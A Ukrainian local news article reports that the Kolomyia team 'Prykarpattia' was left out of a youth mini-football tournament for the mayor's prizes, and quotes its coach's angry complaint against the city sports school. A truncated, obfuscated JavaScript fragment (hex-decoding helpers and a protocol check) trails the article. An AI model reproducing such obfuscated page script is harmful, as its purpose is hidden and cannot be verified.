ЧИТАЙ. ДИВИСЬ. СЛУХАЙ

logo

На міський турнір з міні-футболу не запросили одну з кращих команд Коломиї. ВІДЕО

У Коломиї провели турнір з міні-футболу на призи міського голови. Цього року до команд із Західної України долучилися і юні спортсмени з Одеси. Крім того, за першість боролися футболісти із Буковини, Закарпаття та Львівщини. Господарі виставили дві команди, повідомляє НТК. А ось про одну з найкращих команд міста, "Прикарпаття", організатори забули. Ось що написав про ситуацію тренер "Прикарпаття" Олександр Дем'янчук: "Дуже довго утримувався від коментування ситуації щодо ДЮСШ № 1, але справді напрошується висновок, що деякі особи, які працюють в цій організації, займаються не розвитком дитячо-юнацького спорту в м. Коломия загалом та футболу зокрема, а його саботажем. А як інакше можна назвати ситуацію, коли в місті відбувається дитячий турнір з міні-футболу на призи Міського голови, який доручено провести саме персоналу ДЮСШ, а головна міні-футбольна команда цього міста - фіналіст Кубку та учасник Чемпіонату України не отримує на нього запрошення?
Цікаво, хто ж формував та затверджував списки учасників на цей турнір та чому коломийське "Прикарпаття" в складі якого безкоштовно займається понад 30 дітей з міста району не отримало на нього запрошення? При цьому в числі останніх є команди з Львівщини, Буковини та навіть Одещини. За кошти міського бюджету Коломиї розвивається футбол в цих регіонах? Сказати, що я обурений - це нічого не сказати. За останні кілька років мною в м. Коломия було організовано більш ніж 10 турнірів, в тому числі три дитячих. На кожен з них запрошення отримували команди ДЮСШ міста, які два рази тріумфували у цих змаганнях. І турніри ці проводилися і будуть проводитися не за кошти місцевого бюджету, а із залученням партнерів та спонсорів. Щоправда вже без представників ДЮСШ № 1 міста..."
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "dzerkalo.home"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e